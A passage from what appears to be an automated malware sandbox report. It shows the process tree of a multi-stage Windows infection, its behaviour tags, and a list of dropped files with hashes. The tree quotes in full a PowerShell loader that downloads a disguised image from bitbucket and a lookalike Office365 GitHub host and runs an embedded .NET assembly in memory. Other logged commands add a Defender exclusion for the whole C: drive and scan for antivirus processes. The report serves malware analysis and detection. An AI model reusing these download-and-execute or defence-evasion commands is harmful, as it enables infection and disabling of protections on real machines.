                                                      • Checks processor information in registry
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4616
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {6bdc9991-6b78-4fbb-9732-d4e4baf84ff9} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                        6⤵
                                                          PID:3560
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2492 -prefsLen 27135 -prefMapHandle 2496 -prefMapSize 270279 -ipcHandle 2504 -initialChannelId {86822082-061a-495e-852b-5536c7a93fe8} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                          6⤵
                                                            PID:2720
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3820 -prefsLen 25164 -prefMapHandle 3824 -prefMapSize 270279 -jsInitHandle 3828 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3836 -initialChannelId {7e900dda-74b1-4a60-8f24-1992354a557a} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                            6⤵
                                                            • Checks processor information in registry
                                                            PID:4472
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3988 -prefsLen 27276 -prefMapHandle 3992 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {05416963-be72-4fbb-aba3-579344ca4b4d} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                            6⤵
                                                              PID:4916
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3292 -prefsLen 34775 -prefMapHandle 3128 -prefMapSize 270279 -jsInitHandle 3240 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1628 -initialChannelId {c99637b2-d31f-475c-a13c-fb84e10633c2} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:5080
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5056 -prefsLen 35012 -prefMapHandle 2892 -prefMapSize 270279 -ipcHandle 5100 -initialChannelId {6e6547f4-7e4a-422e-8102-771e0082210a} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:6124
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5336 -prefsLen 32952 -prefMapHandle 5340 -prefMapSize 270279 -jsInitHandle 5344 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5352 -initialChannelId {4d297043-874a-45d1-8d65-3c84f7b01879} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:1316
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5548 -prefsLen 32952 -prefMapHandle 5552 -prefMapSize 270279 -jsInitHandle 5556 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5564 -initialChannelId {66076f4e-65ae-4214-8166-4f56f6366fe3} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:2612
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5756 -prefsLen 32952 -prefMapHandle 5760 -prefMapSize 270279 -jsInitHandle 5764 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5772 -initialChannelId {4d844df5-7dfb-4067-bb36-ef381023b3a2} -parentPid 4616 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4616" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                              6⤵
                                                              • Checks processor information in registry
                                                              PID:5208
                                                      • C:\Users\Admin\AppData\Local\Temp\10338750101\9dd74dd36a.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10338750101\9dd74dd36a.exe"
                                                        3⤵
                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        • Modifies Windows Defender TamperProtection settings
                                                        • Modifies Windows Defender notification settings
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Windows security modification
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6020
                                                      • C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10338760101\Q1DOy22.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:5956
                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                          cmd.exe /c 67e2ff36de8a3.vbs
                                                          4⤵
                                                          • Checks computer location settings
                                                          • Modifies registry class
                                                          PID:5904
                                                          • C:\Windows\System32\WScript.exe
                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e2ff36de8a3.vbs"
                                                            5⤵
                                                            • Checks computer location settings
                                                            PID:5824
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6028
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gbkmAkm/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                                                                7⤵
                                                                • Blocklisted process makes network request
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4440
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                  8⤵
                                                                    PID:5312
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                    8⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:5156
                                                        • C:\Users\Admin\AppData\Local\Temp\10338770101\7IIl2eE.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10338770101\7IIl2eE.exe"
                                                          3⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Drops file in Windows directory
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5716
                                                          • C:\Windows\SysWOW64\CMD.exe
                                                            "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:5968
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist
                                                              5⤵
                                                              • Enumerates processes with tasklist
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:6024
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr /I "opssvc wrsa"
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2912
                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                              tasklist
                                                              5⤵
                                                              • Enumerates processes with tasklist
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5264
                                                            • C:\Windows\SysWOW64\findstr.exe
                                                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2876
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd /c md 418377
                                                              5⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5260
                                                        • C:\Users\Admin\AppData\Local\Temp\10338780101\f73ae_003.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10338780101\f73ae_003.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: MapViewOfSection
                                                          PID:1600
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                            4⤵
                                                              PID:6080
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                5⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5776
                                                            • C:\Windows\system32\svchost.exe
                                                              "C:\Windows\system32\svchost.exe"
                                                              4⤵
                                                              • Downloads MZ/PE file
                                                              • Adds Run key to start application
                                                              PID:1436
                                                              • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                5⤵
                                                                • Sets service image path in registry
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: LoadsDriver
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5188
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Remove-MpPreference -ExclusionPath C:\
                                                                  6⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:7280
                                                              • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                5⤵
                                                                • Deletes itself
                                                                • Executes dropped EXE
                                                                PID:4464
                                                                • C:\Users\Admin\AppData\Local\Temp\{f75eade2-5026-47d6-b571-25afb68a97dc}\52413dca.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\{f75eade2-5026-47d6-b571-25afb68a97dc}\52413dca.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:12376
                                                                  • C:\Users\Admin\AppData\Local\Temp\{3a52aa6a-6865-42bf-abe3-41b3fde10d1a}\71b20344.exe
                                                                    C:/Users/Admin/AppData/Local/Temp/{3a52aa6a-6865-42bf-abe3-41b3fde10d1a}/\71b20344.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                    7⤵
                                                                    • Drops file in Drivers directory
                                                                    • Sets service image path in registry
                                                                    • Executes dropped EXE
                                                                    • Impair Defenses: Safe Mode Boot
                                                                    • Loads dropped DLL
                                                                    • Adds Run key to start application
                                                                    • Enumerates connected drives
                                                                    • Writes to the Master Boot Record (MBR)
                                                                    • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: LoadsDriver
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:12784
                                                          • C:\Users\Admin\AppData\Local\Temp\10338790101\f0a87b325b.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10338790101\f0a87b325b.exe"
                                                            3⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:6364
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10338790101\f0a87b325b.exe"
                                                              4⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5980
                                                          • C:\Users\Admin\AppData\Local\Temp\10338800101\fb1db8ba52.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10338800101\fb1db8ba52.exe"
                                                            3⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            PID:12048
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10338800101\fb1db8ba52.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:13188
                                                          • C:\Users\Admin\AppData\Local\Temp\10338810101\8f985f0a6c.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10338810101\8f985f0a6c.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:6948
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:10460
                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3556
                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:13144

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Downloads

                                                      • C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_9c4d2b28a_arkmon.sys

                                                        Filesize

                                                        390KB

                                                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                        Filesize

                                                        1.9MB

                                                      • C:\Temp\qIMBKt6xw.hta

                                                        Filesize

                                                        779B

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        3KB

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        2KB

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BNB095SR\service[1].htm

                                                        Filesize

                                                        1B

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        17KB

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        17KB

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        17KB

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        64B

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        64B

                                                        MD5

                                                        446dd1cf97eaba21cf14d03aebc79f27

                                                        SHA1

                                                        36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                        SHA256

                                                        a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                        SHA512

                                                        a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        16KB

                                                        MD5

                                                        3d499e6e581e4d7dbf19d613e6f2e503

                                                        SHA1

                                                        05f776a549ed01bb2dc5040785b6c430b3b64e07

                                                        SHA256

                                                        a435e9313bfbe7922cbd426b7f6a6ab04ab3bb0b47ae32bea3caf1a56bcdf167

                                                        SHA512

                                                        02a0922cb99b5b355cbfc5adec76263b79b21d5852baf1db1d77eef23248a3d913be57a4eba48362d7f385467532ef1cb50ab1b6382df5c37f065e138a87dee7

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\33b8gs3a.default-release\activity-stream.discovery_stream.json

                                                        Filesize

                                                        24KB

                                                        MD5

                                                        f04394eefeb2bf03a938c408aeba676f

                                                        SHA1

                                                        419f11b29bbb547e5c1264f891d4dd69d2d60017

                                                        SHA256

                                                        cc3cfd410d480632689e91922180b2baa7d1af6a0ea6388a2181d78bd72e82bb

                                                        SHA512

                                                        9d7ee272ceac99ab0d6799f057717acd7a3f89f24f2f8eabf1a4d94299ac83a7e466220720d37d771cafcb9a8853507a3434fa63bc034f2bbab5f6837285adf3

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\33b8gs3a.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                        Filesize

                                                        13KB

                                                        MD5

                                                        239257d6fcb82fccf9d33dd980583484

                                                        SHA1

                                                        93a79c51442e9e14217c21f3e0555f3127b63f2e

                                                        SHA256

                                                        600266a872f21159169f7f50d21b178cdd2ebe17a7d0521ee1860dbf588b6734

                                                        SHA512

                                                        efe4ae345d252a8841c7e2630284c83cd2e7259765c548e52eef34bcfeff8f138d861f89addb2204f9bd9b16cdd5a864e6c088345677c90eb6c87bdbde4da74a

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\33b8gs3a.default-release\cache2\entries\E19316B1CDA62317F9DA2551F9B56E711FCC77AD

                                                        Filesize

                                                        13KB

                                                        MD5

                                                        a327f232c27a4c0ea853ce0d72cd1733

                                                        SHA1

                                                        fe5e315bc22270808e9bb5faec7d821dbfd96e24

                                                        SHA256

                                                        e046a0b6dd4974947f40ae2722b1fff02e44d53ce830f47e3c4a0c41d0f5a80f

                                                        SHA512

                                                        2fac06cf751421c062311d60493111a5ccc18c8e0dfe436ae573054a1bd358f05728b33e505b21ac674fbe5e6f950384540f6b243bb4564deb5f942bb65ca045

                                                      • C:\Users\Admin\AppData\Local\TempSZV6Z28FVXYTI3A8MEQQEPRLMXOSU3CZ.EXE

                                                        Filesize

                                                        1.8MB

                                                        MD5

                                                        7e28be9ae05283aadb02e48b6568b1cd

                                                        SHA1

                                                        b0cfb5464a357c61074f8a9f91c68629d65cb577

                                                        SHA256

                                                        e82b7730e0dcea0170aef586f99f1be37be04d4c49dc5dc0ed4bbd6fb44cdd64

                                                        SHA512

                                                        c99330571cae54aff05c8c94ea28186f4ef97d5807bbae1fa77d8fba82a55a6a46c029fa27ccdac51efbb8fc59e53a98d892547f1bbd1465e7ce01d8a6401b07

                                                      • C:\Users\Admin\AppData\Local\Temp\10338550101\1b53bc2d1c.exe

                                                        Filesize

                                                        938KB

                                                        MD5

                                                        7aa98cb6c62f709809431301b48b8466

                                                        SHA1

                                                        9124c1e0e281df83bc57a031f319cb87ce6ce7be

                                                        SHA256

                                                        0b76bc73d0d0a139c4a3026845fba53090f5a684af8ee9016dfef8222f47d762

                                                        SHA512

                                                        78c46ec50caa628d76c0f58c14f1e46354393b6ba0ba0fa4dd7df17f827429b9984fd50198eb1349c73f9c11dcf04cd156454be86b4980d6848a20313a0c93ad

                                                      • C:\Users\Admin\AppData\Local\Temp\10338560121\am_no.cmd

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        cedac8d9ac1fbd8d4cfc76ebe20d37f9

                                                        SHA1

                                                        b0db8b540841091f32a91fd8b7abcd81d9632802

                                                        SHA256

                                                        5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

                                                        SHA512

                                                        ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                                                      • C:\Users\Admin\AppData\Local\Temp\10338680101\Q1DOy22.exe

                                                        Filesize

                                                        158KB

                                                        MD5

                                                        ea0e73e3ac9b1dc7d39886061e536910

                                                        SHA1

                                                        5e7d7b87c23837ec0555494c30d9214f598c7d9a

                                                        SHA256

                                                        225e60bae4c67d5e239f6a9325e4deff8571f04dbd3459a91e6c2590240c19fe

                                                        SHA512

                                                        ea4873fc87e0f697beba2ea2c88efe145e1ed52ac971eaf1f061adfbe5692b2b9e9e882a3113bf2d8478c7182caba9c347f82154197c52a45345c9cbbaace285

                                                      • C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe

                                                        Filesize

                                                        327KB

                                                        MD5

                                                        f0676528d1fc19da84c92fe256950bd7

                                                        SHA1

                                                        60064bc7b1f94c8a2ad24e31127e0b40aff40b30

                                                        SHA256

                                                        493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32

                                                        SHA512

                                                        420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8

                                                      • C:\Users\Admin\AppData\Local\Temp\10338710101\32419d60a4.exe

                                                        Filesize

                                                        1.2MB

                                                        MD5

                                                        a38b838486743b7473b4e993ef6f7895

                                                        SHA1

                                                        db8b711f84ea5610b1f3a00c83827c0226b372c9

                                                        SHA256

                                                        843b982f5fe42f642e0f7a3b1c10cddd1bc0e4072e31d6474aff430ef7977960

                                                        SHA512

                                                        f38b6fe2e2cda920904e553984298066b24411edaab4f8c7388f24bb590044e08967283910dbe063a56c784c26f7ef580f85d496880c5ed9cb98b4850e968da1

                                                      • C:\Users\Admin\AppData\Local\Temp\10338720101\d0e74db0d7.exe

                                                        Filesize

                                                        2.9MB

                                                        MD5

                                                        b31438d8e50ba24c6730a92e8525b9c0

                                                        SHA1

                                                        85a6b27c37e38978c96ab75963e7d74c23b510be

                                                        SHA256

                                                        4f4ba9c916147883b5b728a08e663645bd4fa4741971eb9055042b21e3781d4e

                                                        SHA512

                                                        dd048285f4071f7870cf1dd6f317c23d1510f97cc4f7f08a629f3621bc5c5a39505e4e4946ca50e91bc7046cd04a478ed2a7bd4b334d0e43d1f88f1bd757f08a

                                                      • C:\Users\Admin\AppData\Local\Temp\10338730101\234373e26c.exe

                                                        Filesize

                                                        1.7MB

                                                        MD5

                                                        60504d4d47399a0859f55f53dbe4e364

                                                        SHA1

                                                        f733c3cb48b57fb649abce55e545ca3b39af8380

                                                        SHA256

                                                        9b01b4928ef51b988ab7c6f248e2b409c46c85949e3738fbf0cbdc5faeb0fa2e

                                                        SHA512

                                                        c106447b6501adcfb63b5b557cd5c43fe3701964586af69942507ff32a7154f19c2bcf4f616a1cd43c0f473e269ce9481a1b40857dc7bf8052ccd5e0985be311

                                                      • C:\Users\Admin\AppData\Local\Temp\10338740101\811a208ce2.exe

                                                        Filesize

                                                        950KB

                                                        MD5

                                                        5bc5ec70cf81a33eed0884528c27ae07

                                                        SHA1

                                                        1dc9376ba438f87bfcab339f57cd31469fe6db76

                                                        SHA256

                                                        971b2497756da30428fe92201e7e59d69b997ea07c9160ff76a5149e0858293f

                                                        SHA512

                                                        c6a5e7dc655aa655da6f6d937c7f40797a9da598499e5e7ad53e45a2a8af1a4fc3463f90e40761fead2929cbbc697dbf00f65c3e830f8308097620cf82829b7e

                                                      • C:\Users\Admin\AppData\Local\Temp\10338750101\9dd74dd36a.exe

                                                        Filesize

                                                        1.7MB

                                                        MD5

                                                        117266b5e165a19a7370df142912795f

                                                        SHA1

                                                        9ff7f3045ff82435bc77ba2a8995d28606c92661

                                                        SHA256

                                                        d787026f29e4f2e1c1359e4f1ff901a8172563522e0874c19bdc2483e94c9090

                                                        SHA512

                                                        13a063fc3cd5c44d4b7122f3015f9f7caa8df7f870bba045738aaa66630f3865d8aaeb40019b3a58f778dd3cd43deabfac19f5212b9826788be0a29f3e94a2f7

                                                      • C:\Users\Admin\AppData\Local\Temp\10338770101\7IIl2eE.exe

                                                        Filesize

                                                        1.2MB

                                                        MD5

                                                        7d842fd43659b1a8507b2555770fb23e

                                                        SHA1

                                                        3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

                                                        SHA256

                                                        66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

                                                        SHA512

                                                        d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

                                                      • C:\Users\Admin\AppData\Local\Temp\10338780101\f73ae_003.exe

                                                        Filesize

                                                        1.3MB

                                                        MD5

                                                        eb880b186be6092a0dc71d001c2a6c73

                                                        SHA1

                                                        c1c2e742becf358ace89e2472e70ccb96bf287a0

                                                        SHA256

                                                        e4e368cac17981db7fbd37b415ee530900179f1c73aa7fad0e169fcc022e8f00

                                                        SHA512

                                                        b6b9fad4e67df75c8eea8702d069cc1df0b8c5c3f1386bc369e09521cbf4e8e6b4c08102ceea5ca40509bf0593c6c21b54acf9b8c337bff6aa1f3afc69d0f96e

                                                      • C:\Users\Admin\AppData\Local\Temp\10338790101\f0a87b325b.exe

                                                        Filesize

                                                        4.5MB

                                                        MD5

                                                        905b8a3c0ab8714327da4744ebcefa85

                                                        SHA1

                                                        c511179b651b87c0d66d7ac659b5708a03128c16

                                                        SHA256

                                                        92a04d23f88afd9141fb90e4d858453e5272fbd611f429e4494d4aab82a63fa6

